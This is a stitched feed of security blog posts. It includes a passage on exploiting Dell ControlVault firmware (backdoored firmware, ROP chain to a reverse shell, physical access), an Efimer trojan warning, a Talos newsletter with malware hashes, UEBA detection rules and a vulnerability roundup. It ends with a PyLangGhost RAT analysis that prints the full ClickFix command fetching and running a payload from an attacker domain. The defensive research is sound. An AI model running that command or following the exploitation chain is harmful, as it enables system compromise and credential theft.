    • One of the variables fed to the CV Command needs to be a stack variable that can be corrupted using the bug reported in CVE-2025-24919 (e.g., like the “pLen” variable in “cv_get_random”).
    • No stack cookie may be present between the to-be-corrupted stack variable and the return address targeted by the stack overflow.

    Finding what to target

    The “cv_get_random” function would be an ideal candidate, but unfortunately it’s hard to find code that is using this function reliably.

    After investigating most of the CV commands, we found the following:

    Figure 24: WBFUSH_ExistsCVObject calling CSS_GetObject.

    The first argument to this function, “cvHandle”, is a handle to an object. It is passed to “CSS_GetObject”, which will populate the stack variable “objHeader” with the header of the object tied to this handle. Down the call-stack, “cv_get_object” is called with both the “cvHandle” and the “objHeader” variables. Due to these functions’ stack layout, it is possible to leverage CVE-2025-24919 to corrupt the “objHeader” variable and trigger a stack overflow in its parent function.

    Exploitation details

    The “WBFUSH_ExistsCVObject” function is used by “BCMStorageAdapter.dll” to verify if an object handle is tied to a real object stored in the ControlVault firmware. Meanwhile, “BCMStorageAdapter” is part of Broadcom’s implementation of the adapters required to interface with the Windows Biometric Framework (WBF). These adapters are necessary to interface a fingerprint reader with WBF so it can be used with Windows Hello (fingerprint login) or other biometric-enabled scenarios. Here is the call stack to reach the vulnerable function:

    StorageAdapterControlUnit 
      -> WBFUSH_ExistsCVObject 
        -> CSS_GetObject
          -> cv_get_object

    The “StorageAdapterControlUnit” function can be reached by a regular user opening the proper adapter with “WinBioOpenSession” and then issuing a “WinBioControlUnit” command with the “WINBIO_COMPONENT_STORAGE” component.

    Figure 25: WinBioControlUnit prototype.

    The “ControlCode” parameter specifies which adapter’s function to invoke.

    Figure 26: StorageAdapterControlUnit with ControlCode=2.

    By reversing “BCMStorageAdapter!StorageAdapterControlUnit”, we find that using “ControlCode=2” will lead to calling “WBFUSH_ExistsCVObject” with a caller-provided handle. Specifically, the first four bytes of the “SendBuffer” argument passed to “WinBioControlUnit” are cast into the expected object handle.

    With this in mind, the exploitation process is as follows:

    1. Achieve code execution on the firmware to leak the device keys and gain the ability to forge a firmware file that will be accepted by this specific device.
    2. Forge a malicious firmware update with a modified “cv_get_object” function.
      1. The “cv_get_object” function will be backdoored: if the object handle matches a specific magic value (e.g., 0x1337) it will return the stack-overflow payload and tamper with the encapsulation parameters to trigger CVE-2025-24919. If the handle is not 0x1337, “cv_get_object” will execute normally to avoid unintended side-effects from the backdoor.
      2. The stack-overflow payload will be a ROP chain that will eventually lead to the execution of a reverse-shell.
    3. Install the malicious firmware update.
    4. Invoke the “WinBioControlUnit” function with “ControlCode=2” and b"\x37\x13\x00\x00" as the “SendBuffer” (little-endian representation of 0x1337 as a DWORD).
    5. Connect to the reverse shell and observe having obtained SYSTEM privileges.





    Figure 27: Demo SYSTEM service exploit.

    Going further

    Implant

    The process described above could be seen as one of the most convoluted ways to perform an elevation of privileges to SYSTEM on Windows. However, this should be considered in context. There are other services and functions that could be used instead. In our example here, we picked functions that were easy to build a demo with. In practice, other functions could be leveraged so that no user interaction would be required to trigger the vulnerabilities. This would make sense for a standalone implant that could lay dormant and trigger from time to time in order to call home. Development of a weaponized implant is of course beyond the scope of our research.

    Physical attacks

    Another promising angle that we have yet to mention is physical access. The USH board is an internal USB device. It is possible to open the laptop that contains the board and connect to it directly, provided one has the proper connector. There are mitigations against physical access (e.g., chassis intrusion alerts), but those are generally opt-in. As such, an attacker with 10-20 minutes of physical access could perform the same attacks described in this deep dive, but without any of the other requirements (e.g., no need to be able to log in as a user, and disk encryption would not protect against this).

    The following video is a short demo of the feasibility of connecting directly to a USH board over USB.






    Figure 28: Demo physical attack.

    Please note that in the video above, a ControlVault device is already present but disabled. This is because the machine used already had a ControlVault device built in. The relevant driver/dll were also already installed. Upon connecting the USB cable, a new ControlVault device pops up and this is the one that is being interacted with.

    Impact

    Attack scenario

    The risks we’ve explored in this article can be summarized in the following diagram:

    Figure 29: Attack scenarios.

    The ability to modify the firmware running on one of the USH boards can be used by a local attacker to either gain privileges, bypass fingerprint login and/or compromise Windows. A threat actor could also leverage this in a post-compromise situation. If a user’s workstation is compromised, one could tamper with the ControlVault firmware running on their machine to act as an implant that could remain present even after a full system reinstall.

    Detection

    Detecting a compromised ControlVault device can be tricky. An implant could ignore new firmware updates. This is why verifying that a legitimate firmware update can be successfully installed and then returns the expected version string is a good first check to perform.

    This can be done with the Python code provided at the beginning of this article (figure 5). A second way is to look at the properties of the ControlVault device in the Device Manager. The “Versioning” panel will show the ControlVault firmware version as reported by the device.

    Local exploitation of the ControlVault device can be detected by monitoring unexpected processes loading “bcmbipdll.dll” or those trying to open a handle to the ControlVault device itself. The path for the device may depend on the laptop model and its internal USB connections. The full path can be retrieved using “SetupDiGetClassDevsW / SetupDiEnumDeviceInterfaces” with the InterfaceGuid: {79D2E5E9-8883-4E9D-91CB-A14D2B145A41}.
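
As a starting point for that kind of monitoring, the sketch below (ours, using the third-party psutil package) lists processes that currently have “bcmbipdll.dll” mapped, so that unexpected loaders stand out. The allowlist of expected process names is illustrative only and will differ per environment:

import psutil

# Illustrative allowlist: processes we would normally expect to talk to ControlVault.
EXPECTED = {"bcmhoststorageservice.exe", "bcmhostcontrolservice.exe",
            "bcmushupgradeservice.exe"}

for proc in psutil.process_iter(["pid", "name"]):
    try:
        maps = proc.memory_maps()
    except (psutil.AccessDenied, psutil.NoSuchProcess):
        continue  # enumerating other users' processes needs admin rights
    if any("bcmbipdll.dll" in (m.path or "").lower() for m in maps):
        name = (proc.info["name"] or "").lower()
        flag = "" if name in EXPECTED else "  <-- unexpected loader"
        print("%6d  %s%s" % (proc.info["pid"], proc.info["name"], flag))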

    Finally, unexpected crashes in “WinBioSvc”, “bcmHostStorageService”, “bcmHostControlService” or “bcmUshUpgradeService” could be signs of something being amiss.

    Conclusion

    ControlVault is a surprisingly complex attack surface spanning the whole gamut from hardware to firmware and software. Multiple peripherals, frameworks, and drivers are involved as well. It has a legacy codebase that can be traced back to the early 2010s, and various first-party software has interacted with it over the years. This deep dive has barely scratched the surface of ControlVault’s complexity, and yet we have shown how far-reaching the consequences of a compromise could be. Perhaps the most surprising thing is that our work appears to be the first public research on the subject. Firmware security isn’t a new topic, but still, how many other ControlVault-like devices are yet to be found and assessed for the unexpected risk they may bring?

    Cisco Talos Blog – ​Read More

    Android adware: What is it, and how do I get it off my device?

    Is your phone suddenly flooded with aggressive ads, slowing down performance or leading to unusual app behavior? Here’s what to do.

    WeLiveSecurity – ​Read More

    Black Hat USA 2025: Is a high cyber insurance premium about your risk, or your insurer’s?

    A sky-high premium may not always reflect your company’s security posture

    WeLiveSecurity – ​Read More

    Black Hat USA 2025: Policy compliance and the myth of the silver bullet

    Who’s to blame when the AI tool managing a company’s compliance status gets it wrong?

    WeLiveSecurity – ​Read More

    The Efimer Trojan steals cryptocurrency via malicious torrent files and WordPress websites | Kaspersky official blog

    If you’re an active cryptocurrency user but you’re still downloading torrent files and aren’t sure how to safely store your seed phrases, we’ve some bad news for you. We’ve discovered a new Trojan, Efimer, that replaces crypto wallet addresses right in your clipboard. One click is all it takes for your money to end up in a hacker’s wallet.

    Here’s what you need to do to keep your crypto safe.

    How Efimer spreads

    One of Efimer’s main distribution channels is WordPress websites. It doesn’t help that WordPress is a free content-management system for websites — or that it’s the world’s most popular. Everyone from small-time bloggers and businesses to major media outlets and corporations uses it. Scammers exploit poorly secured sites and publish posts with infected torrent files.

    This is what a hacked WordPress website infected with Efimer looks like


    When a user downloads a torrent file from an infected site, they get a small folder that contains what looks like a movie file with the .xmpeg extension. You can’t open a file in that format without a “special media player”, which is conveniently included in the folder. In reality, the “player” is a Trojan installer.

    The torrent folder with the malicious files inside


    Recently, Efimer has also started spreading through phishing emails. Website and domain owners receive emails, purportedly from lawyers, falsely claiming copyright infringement and demanding content removal. The emails say all the details are in the attachment… which is actually where the Trojan is lurking. Even if you don’t own a website yourself, you can still receive spam email messages with Efimer attached. Threat actors collect user email addresses from WordPress sites they’ve previously compromised. So, if you get an email like this, whatever you do — don’t open the attachment.

    How Efimer steals your crypto

    Once Efimer infects a device, one of its scripts adds itself to the Windows Defender exclusion list — provided the user has administrator privileges. The malware then installs a Tor client to communicate with its command-and-control server.

    Efimer accesses the clipboard and searches for a seed phrase, which is a unique sequence of words that allows access to a crypto wallet. The Trojan saves this phrase and sends it to the attackers’ server. If it also finds a crypto wallet address in the clipboard, Efimer discreetly swaps it out for a fake one. To avoid raising suspicion, the fake address is often very similar to the original. The end result is that cryptocurrency is silently transferred to the cybercrooks.

    Wallets containing Bitcoin, Ethereum, Monero, Tron, or Solana are primarily at risk, but owners of other cryptocurrencies shouldn’t let their guard down. The developers of Efimer regularly update the malware by adding new scripts and extending support for more crypto wallets. You can find out more about Efimer’s capabilities in our analysis on Securelist.

    Who’s at risk?

    The Trojan is attacking Windows users all over the world. Currently the malware is most active in Brazil, Russia, India, Spain, Germany, and Italy, but the scope of these attacks could easily expand to your country, if it’s not already on the list. Users of crypto wallets, owners of WordPress sites, and those who frequently download movies, games, and torrent files from the internet should be especially vigilant.

    How to protect yourself from Efimer

    The Efimer Trojan is a real jack-of-all-trades. It’s capable of stealing cryptocurrency and swapping crypto wallet addresses, and it poses a serious threat to both individuals and organizations. It can use scripts to hack WordPress sites, and is able to spread on its own. However, in every case, a device can only be infected if the potential victim downloads and opens a malicious file themselves. This means that a little vigilance and a healthy dose of caution — ignoring files from suspicious sources at the very least — is your best defense against Efimer.

    Here are our recommendations for home users:

    • Use a robust security solution that can scan files for malware and warn you against opening phishing links.
    • Create unique and strong passwords. And no, storing them in your notes app is not a good idea. Make sure you use a password manager.
    • Use two-factor authentication to sign in to crypto wallets and websites.
    • Avoid downloading movies or games from unverified sites. Pirated content is often crawling with all kinds of Trojans. Even if you choose to take that risk, pay close attention to the file extensions. A regular video file definitely won’t have an .exe or .xmpeg extension.
    • Don’t store your seed phrases in plain text files. Trust a password manager. Read this article to learn more about how to protect your cryptocurrency assets.

    What other threats lurk in the crypto world:

    Kaspersky official blog – ​Read More

    AI wrote my code and all I got was this broken prototype


    Welcome to this week’s edition of the Threat Source newsletter. 

    Vulnerabilities within software are a persistent challenge. Software engineers inadvertently tend to make the same mistakes repeatedly, with the same entries appearing in the annual top 25 list of Common Weakness Enumerations each year. 

    The truth is, writing software is difficult. Software engineering is a craft that demands concentration, knowledge and time, all coupled with extensive testing. Even the most skilled software engineer can get distracted or have a bad day, leading to a hidden vulnerability inadvertently making its way into a production codebase.

    Identifying vulnerabilities early in the software development process is one of the promises of AI. The idea being that an AI agent would write perfect code under the direction of a software engineer or verify and correct code written by a human. 

    Last weekend, I decided to put this premise to the test. As a somewhat rusty software engineer, I resolved to see if AI could assist me with a personal software project. Initially, I was impressed: the AI agent offered an engaging discussion about high-level architecture and the trade-offs of various approaches. I was amazed at the lines of code that the AI generated on request. All the software for my project, written at the press of a button!

    Then came the testing. Although the code looked convincing, it failed to interface with the required libraries. Parameters were incorrect, and it tried to call fictional functions. It seemed that the way the AI imagined the library to work didn’t reflect reality or the available documentation. Similarly, there were fewer sanity checks and less verification of variable values than I was comfortable with, especially since many of these values were derived from external inputs.

    To be fair, the AI code resolved a tricky threading issue that had defeated me, and the ‘boilerplate’ code necessary to form the skeleton structure of the software was flawless. I felt that I achieved a productivity boost from the AI’s exposure to ‘frequently encountered’ coding issues. However, when it came to more esoteric APIs with which I was moderately familiar, the AI was unable to generate functional code or correctly diagnose reported errors. 

    After some debugging and manual rewriting, I managed to create a working prototype. The code is clearly not bulletproof, but then again, I hadn’t explicitly asked for code that was secured against all potential hacks. Like many software engineers, myself and my AI assistant focused on quickly delivering the desired functionality, rather than considering the long-term operation of the code in a potentially hostile environment. 

    I remain optimistic that AI-assisted coding is the pathway to a future free of software vulnerabilities. However, my recent limited personal experience leads me to think that we still have a considerable journey ahead before we can definitively resolve software vulnerabilities for good.

    I hope you all have a tremendous time at Summer Camp, see a lot of old friends and make new ones and most importantly that you shower and use deodorant. Conference season is a marathon, it’s long, it’s arduous, it’s sweaty – be the hygienic change you want to see in the world.  

    The one big thing 

    Continuing the AI theme, Guilherme describes how AI LLM models can be used to assist in the reverse engineering of malware. Used correctly, LLMs can provide valuable insights and facilitate the analysis of malware. 

    Why do I care? 

    Reverse engineering malware is the often time-consuming task of identifying the execution path of malicious software. Frequently malware writers obfuscate their code to make it difficult to understand and follow what their code is doing. Advances in technology that can speed up this process make fighting malware easier.  

    So now what? 

    Investigate if the tools and approaches described in the blog can be used to improve your reverse engineering process, or as a means to begin learning about reverse engineering. 

    Top security headlines of the week 

    As ransomware gangs threaten physical harm, ‘I am afraid of what’s next,’ ex-negotiator says

    In an effort to increase the pressure on victims, ransomware gangs are now using threats of physical violence. (The Register)

    ‘Shadow AI’ increases cost of data breaches, report finds

    Unmanaged and unsecured use of AI is leading to data breaches. (Cybersecurity Dive)

    Enough to drive a cybersecurity officer mad: one rule here, a different rule there

    Chief information security officers call for less fragmentation in global cybersecurity regulations. (ASPI)

    UK Online Safety Act promotes insecurity

    The implementation of the UK Online Safety Act requiring age verification for content deemed harmful to children introduces some security quandaries. (Tech HQ)

    Can’t get enough Talos? 

    Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analyst

    A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages). Watch here.

    Tales from the Frontlines

    Join the Cisco Talos Incident Response team to hear real-world stories from the frontlines of cyber defense. Reserve your spot.

    Vulnerability roundup

    Cisco Talos’ Vulnerability Discovery & Research team recently disclosed seven vulnerabilities in WWBN AVideo, four in MedDream, and one in an Eclipse ThreadX module. Read more.

    Talos Takes

    Hazel is joined by threat intelligence researcher James Nutland to discuss Cisco Talos’ latest findings on the newly emerged Chaos ransomware group. Listen here.

    Upcoming events where you can find Talos 

    It’s the summer. We’ll be on the beach. 

    Most prevalent malware files from Talos telemetry over the past week  

    SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
    MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
    VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
    Typical Filename: VID001.exe 
    Claimed Product: N/A 
    Detection Name: Win.Worm.Coinminer::1201  

    SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
    MD5: 7bdbd180c081fa63ca94f9c22c457376  
    VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details  
    Typical Filename: IMG001.exe   
    Detection Name: Simple_Custom_Detection 

    SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610 
    MD5: 85bbddc502f7b10871621fd460243fbc  
    VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details 
    Typical Filename: N/A 
    Claimed Product: Self-extracting archive 
    Detection Name: Win.Worm.Bitmin-9847045-0 

    SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
    MD5: 71fea034b422e4a17ebb06022532fdde   
    VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details  
    Typical Filename: VID001.exe   
    Claimed Product: N/A   
    Detection Name: Coinminer:MBT.26mw.in14.Talos  

    SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
    MD5: df11b3105df8d7c70e7b501e210e3cc3  
    VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details  
    Typical Filename: DOC001.exe  
    Claimed Product: N/A  
    Detection Name: Win.Worm.Coinminer::1201 

    Cisco Talos Blog – ​Read More

    UEBA rules in Kaspersky SIEM | Kaspersky official blog

    Today’s cyberattackers are masters of disguise — working hard to make their malicious activities look like normal processes. They use legitimate tools, communicate with command-and-control servers through public services, and mask the launch of malicious code as regular user actions. This kind of activity is almost invisible to traditional security solutions; however, certain anomalies can be uncovered by analyzing the behavior of specific users, service accounts, or other entities. This is the core concept behind a threat detection method called UEBA, short for “user and entity behavior analytics”. And this is exactly what we’ve implemented in the latest version of our SIEM system — Kaspersky Unified Monitoring and Analysis Platform.

    How UEBA works within an SIEM system

    By definition, UEBA is a cybersecurity technology that identifies threats by analyzing the behavior of users, devices, applications, and other objects in an information system. While in principle this technology can be used with any security solution, we believe it’s most effective when integrated in an SIEM platform. By using machine learning to establish a normal baseline for a user or object’s behavior (whether it’s a computer, service, or another entity), an SIEM system equipped with UEBA detection rules can analyze deviations from typical behavior. This allows for the timely detection of APTs, targeted attacks, and insider threats.

    This is why we’ve equipped our SIEM system with a UEBA rule package designed specifically to detect anomalies in authentication processes, network activity, and the execution of processes on Windows-based workstations and servers. This makes our system smarter at finding novel attacks that are difficult to spot with regular correlation rules, signatures, or indicators of compromise. Every rule in the UEBA package is based on profiling the behavior of users and objects. The rules fall into two main categories:

    • Statistical rules, which use the interquartile range to identify anomalies based on current behavior data.
    • Rules that detect deviations from normal behavior, which is determined by analyzing an account or object’s past activity.

    When a deviation from a historical norm or statistical expectation is found, the system generates an alert and increases the risk score of the relevant object (user or host). (Read this article to learn more about how our SIEM solution uses AI for risk scoring.)
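
    To make the statistical category more concrete, here is a minimal Python sketch of the kind of interquartile-range check such a rule could perform. The field names, the baseline window, and the 1.5 × IQR multiplier are illustrative assumptions, not the actual rule logic shipped in the Kaspersky SIEM.

from statistics import quantiles

def iqr_bounds(history, k=1.5):
    # Quartiles of the baseline window; k * IQR sets the tolerance band (assumed value).
    q1, _, q3 = quantiles(history, n=4)
    iqr = q3 - q1
    return q1 - k * iqr, q3 + k * iqr

def is_anomalous(current_value, history, k=1.5):
    # Flag the current observation if it falls outside the IQR-derived bounds.
    low, high = iqr_bounds(history, k)
    return current_value < low or current_value > high

# Example: daily count of failed logons for a single account (made-up numbers)
baseline = [3, 5, 4, 6, 2, 5, 4, 3, 5, 4]
if is_anomalous(42, baseline):
    print("Deviation detected: raise an alert and increase the account's risk score")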

    Structure of the UEBA rule package

    For this rule package, we focused on the areas where UEBA technology works best — such as account protection, network activity monitoring, and secure authentication. Our UEBA rule package currently features the following sections:

    Authentication and permission control

    These rules detect unusual login methods, sudden spikes in authentication errors, accounts being added to local groups on different computers, and authentication attempts outside normal business hours. Each of these deviations is flagged and increases the user’s risk score.

    DNS profiling

    Dedicated to analysis of DNS queries made by computers on the corporate network. The rules in this section collect historical data to identify anomalies like queries for unknown record types, excessively long domain names, unusual zones, or atypical query frequencies. It also monitors the volume of data returned via DNS. Any such deviations are considered potential threats, and thus increase the host’s risk score.
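
    As a rough illustration of the checks described above, here is a small Python sketch that flags excessively long domain names and first-seen record types or zones. The log field names, the 60-character threshold, and the naive zone extraction are assumptions for illustration only.

def check_dns_query(query, host_profile, max_name_len=60):
    # Return a list of reasons this DNS query deviates from the host's historical profile.
    reasons = []
    if len(query["qname"]) > max_name_len:
        reasons.append("unusually long domain name")
    if query["qtype"] not in host_profile["seen_qtypes"]:
        reasons.append("first query of record type " + query["qtype"])
    zone = ".".join(query["qname"].rstrip(".").split(".")[-2:])  # crude registrable-zone guess
    if zone not in host_profile["seen_zones"]:
        reasons.append("first query to zone " + zone)
    return reasons

profile = {"seen_qtypes": {"A", "AAAA", "MX"}, "seen_zones": {"example.com", "corp.local"}}
print(check_dns_query({"qname": "a" * 70 + ".suspicious.example", "qtype": "TXT"}, profile))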

    Network activity profiling

    Tracking connections between computers both within the network and to external resources. These rules flag first-time connections to new ports, contacts with previously unknown hosts, unusual volumes of outgoing traffic, and access to management services. All actions that deviate from normal behavior generate alerts and raise the risk score.

    Process profiling

    This section monitors programs launched from Windows system folders. If a new executable runs for the first time from the System32 or SysWOW64 directories on a specific computer, it’s flagged as an anomaly. This raises the risk score for the user who initiated the process.
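
    A minimal sketch of such a first-seen check might look like the following Python snippet; the event fields and the in-memory baseline are assumptions, and a real deployment would persist the baseline per host.

from pathlib import PureWindowsPath

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

def flag_new_system_binary(event, baseline):
    # Flag an executable launched from System32/SysWOW64 for the first time on this host.
    path = PureWindowsPath(event["image_path"])
    if str(path.parent).lower() not in SYSTEM_DIRS:
        return False
    key = (event["host"], path.name.lower())
    if key in baseline:          # seen before on this host: considered normal
        return False
    baseline.add(key)            # remember it for future comparisons
    return True                  # first occurrence: raise the initiating user's risk score

seen = set()
evt = {"host": "WS-042", "image_path": r"C:\Windows\System32\oddbinary.exe", "user": "j.doe"}
if flag_new_system_binary(evt, seen):
    print("Anomaly: first run of", evt["image_path"], "on", evt["host"], "by", evt["user"])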

    PowerShell profiling

    This section tracks the source of PowerShell script executions. If a script runs for the first time from a non-standard directory — one that isn’t Program Files, Windows, or another common location — the action is marked as suspicious and increases the user’s risk score.

    VPN monitoring

    This flags a variety of events as risky — including logins from countries not previously associated with the user’s profile, geographically impossible travel, unusual traffic volumes over a VPN, VPN client changes, and multiple failed login attempts. Each of these events results in a higher risk score for the user’s account.
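
    The “geographically impossible travel” check in particular is easy to picture: compare the distance between two consecutive login locations with the time between them. The Python sketch below uses the haversine formula and an assumed 900 km/h speed ceiling; it is an illustration, not the product’s implementation.

from math import radians, sin, cos, asin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    # Great-circle distance between two coordinates, in kilometers.
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))

def impossible_travel(prev_login, new_login, max_speed_kmh=900):
    # True if the user would have had to travel faster than a commercial flight.
    hours = (new_login["ts"] - prev_login["ts"]) / 3600
    if hours <= 0:
        return True
    km = haversine_km(prev_login["lat"], prev_login["lon"], new_login["lat"], new_login["lon"])
    return km / hours > max_speed_kmh

# Login from Berlin, then from Tokyo two hours later: flag it and raise the account's risk score
a = {"ts": 0, "lat": 52.52, "lon": 13.40}
b = {"ts": 2 * 3600, "lat": 35.68, "lon": 139.69}
print(impossible_travel(a, b))   # True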

    Using these UEBA rules helps us detect sophisticated attacks and reduce false positives by analyzing behavioral context. This significantly improves the accuracy of our analysis and lowers the workload of security analysts. Using UEBA and AI to assign a risk score to an object speeds up and improves each analyst’s response time by allowing them to prioritize incidents more accurately. Combined with the automatic creation of typical behavioral baselines, this significantly boosts the overall efficiency of security teams. It frees them from routine tasks, and provides richer, more accurate behavioral context for threat detection and response.

    We’re constantly improving the usability of our SIEM system. Stay tuned for updates to the Kaspersky Unified Monitoring and Analysis Platform on its official product page.

    Kaspersky official blog – ​Read More

    WWBN, MedDream, Eclipse vulnerabilities


    Cisco Talos’ Vulnerability Discovery & Research team recently disclosed seven vulnerabilities in WWBN AVideo, four in MedDream, and one in an Eclipse ThreadX module.

    The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

    For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

    WWBN XSS, race condition, incomplete blacklist vulnerabilities

    Discovered by Claudio Bozzato of Cisco Talos.

    WWBN AVideo is a video streaming platform with hosting, management, and video monetization features.

    Talos found five cross-site scripting (XSS) vulnerabilities in WWBN AVideo 14.4 and dev master commit 8a8954ff.

    A specially crafted HTTP request can lead to arbitrary JavaScript execution in all five cases. An attacker must get a user to visit a webpage to trigger these vulnerabilities.

    Additionally, Talos identified two vulnerabilities that, when chained together, can lead to arbitrary code execution:

    TALOS-2025-2212 (CVE-2025-25214) A race condition vulnerability exists in the aVideoEncoder.json.php unzip functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A series of specially crafted HTTP requests can lead to arbitrary code execution.

    TALOS-2025-2213 (CVE-2025-48732) An incomplete blacklist exists in the .htaccess sample of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can request a .phar file to trigger this vulnerability.

    MedDream

    Discovered by Emmanuel Tacheau and Marcin Noga of Cisco Talos.

    MedDream PACS Premium is a DICOM 3.0 compliant picture archiving and communication system for the medical industry. The PACS server provides connectivity to all DICOM modalities (CR, DX, CT, MR, US, XA, etc.).

    Talos found four unique MedDream PACS Premium vulnerabilities.

    TALOS-2025-2154 (CVE-2025-26469) is an incorrect default permissions vulnerability in the CServerSettings::SetRegistryValues functionality of MedDream PACS Premium 7.3.3.840. A specially crafted application can decrypt credentials stored in a configuration-related registry key. An attacker can execute a malicious script or application to exploit this vulnerability.

    TALOS-2025-2156 (CVE-2025-27724) is a privilege escalation vulnerability in the login.php functionality of MedDream PACS Premium 7.3.3.840. A specially crafted .php file can lead to elevated capabilities. An attacker can upload a malicious file to trigger this vulnerability.

    TALOS-2025-2176 (CVE-2025-32731) is a reflected XSS vulnerability in the radiationDoseReport.php functionality of MedDream PACS Premium 7.3.5.860. A specially crafted malicious URL can lead to arbitrary JavaScript code execution. An attacker can provide a crafted URL to trigger this vulnerability.

    TALOS-2025-2177 (CVE-2025-24485) is a server-side request forgery (SSRF) vulnerability in the cecho.php functionality of MedDream PACS Premium 7.3.5.860. A specially crafted HTTP request can lead to SSRF. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.

    Eclipse ThreadX FileX integer underflow vulnerability

    Discovered by Kelly Patterson of Cisco Talos.

    Eclipse ThreadX is an embedded development suite for an advanced real-time operating system (RTOS) that provides efficient performance for resource-constrained devices. 

    TALOS-2024-2088 is a buffer overflow vulnerability in the FileX RAM disk driver functionality of Eclipse ThreadX FileX git commit 1b85eb2. A specially crafted set of network packets can lead to code execution. An attacker can send a sequence of requests to trigger this vulnerability.

    Cisco Talos Blog – ​Read More

    PyLangGhost RAT: Rising Data Stealer from Lazarus Group Targeting Finance and Technology 

    Editor’s note: The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can find Mauro on X. 

    North Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with a variety of custom malware families. In previous research, we examined strains like InvisibleFerret, BeaverTail, and OtterCookie, often deployed through fake developer job interviews or staged business calls with executives. While these have been the usual suspects, a newer Lazarus subgroup, Famous Chollima, has recently introduced a fresh threat: PyLangGhost RAT, a Python-based evolution of GoLangGhost RAT. 

    Unlike common malware that spreads through pirated software or infected USB drives, PyLangGhost RAT is delivered via highly targeted social engineering campaigns aimed at the technology, finance, and crypto industries, with developers and executives as prime victims. In these attacks, adversaries stage fake job interviews and trick their targets into believing that their browser is blocking access to the camera or microphone. The “solution” they offer is to run a script that supposedly grants permission. In reality, the script hands over full remote access to a North Korean operator. 

    This sample was obtained from fellow researcher Heiner García Pérez of BlockOSINT, who encountered it during a fake job recruitment attempt and documented his findings in an advisory.  

    Let’s break it down. 

    A fake interview process. Source: BlockOSINT

    Key Takeaways 

    • Attribution: PyLangGhost RAT is linked to the North Korean Lazarus subgroup Famous Chollima, known for using highly targeted and creative intrusion methods. 
    • Delivery Method: Distributed through “ClickFix” social engineering, where victims are tricked into running malicious commands to supposedly fix a fake camera or microphone error during staged job interviews. 
    • Core Components: The malware’s main loader (nvidia.py) relies on multiple modules (config.py, api.py, command.py, util.py, auto.py) for persistence, C2 communication, command execution, data compression, and credential theft. 
    • Credential & Wallet Theft: Targets browser-stored credentials and cryptocurrency wallet data from extensions like MetaMask, BitKeep, Coinbase Wallet, and Phantom, using privilege escalation and Chrome encryption key decryption (including bypasses for Chrome v20+). 
    • C2 Communication: Communicates over raw IP addresses with no TLS, using weak RC4/MD5 encryption, but remains stealthy with very low initial detection rates (0–3 detections on VirusTotal). 
    • Code Origin: Appears to be a full Python reimplementation of GoLangGhost RAT, likely aided by AI, as indicated by Go-like logic patterns, unusual code structure, and large commented-out sections. 

    The Fake Job Offer Trap 

    In the past, DPRK operators have resorted to creative methods to distribute malware, from staging fake job interviews and sharing bogus coding challenges (some laced with malware, others seemingly clean but invoking malicious dependencies at runtime), to posing as VCs in business calls, pretending not to hear the victim, and prompting them to download a fake Zoom fix or update. 

    This case is a bit different. It falls into a newer category of attacks called “ClickFix” — scenarios where the attacker, or one of their websites, presents the victim with fake CAPTCHAs or error messages that prevent them from completing an interview or coding challenge. The proposed fix is deceptively simple: copy a command shown on the website and paste it into a terminal or the Windows Run window (Win + R) to “solve the issue.” By doing so, users end up executing malicious scripts with their own privileges, or even worse, as Administrator, essentially handing control of the system to a Chollima operator. 

    A fake “Race Condition” Error, prompting the user to run a command. Source: BlockOSINT

    In this case, the researcher received a fake job offer to work at the Aave DeFi Protocol. After a brief screening with a few generic questions, he was redirected to a page that began flooding him with notifications about an error dubbed “Race Condition in Windows Camera Discovery Cache.” 

    Luckily, the website offered a quick fix for this “problem”: just run a small code snippet in the terminal. 

    But what does this code actually do? Let’s find out. 

    Chollimas & Pythons 

    Let’s analyze the command: 

    curl -k -o "%TEMP%\nvidiaRelease.zip" https://360scanner.store/cam-v-b74si.fix && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'" && wscript "%TEMP%\nvidiaRelease\update.vbs"

    This line: 

    • Downloads a ZIP file from 360scanner[.]store using curl. 
    • Extracts it to the %TEMP%\nvidiaRelease directory using PowerShell’s Expand-Archive. 
    • Executes a VBScript named update.vbs via wscript. 
    update.vbs contents

    Now let’s look at what this script actually does:

    Inside update.vbs 

    It silently decompresses Lib.zip to the same directory, using tar, and waits for the extraction to finish, hiding any windows during the process. 

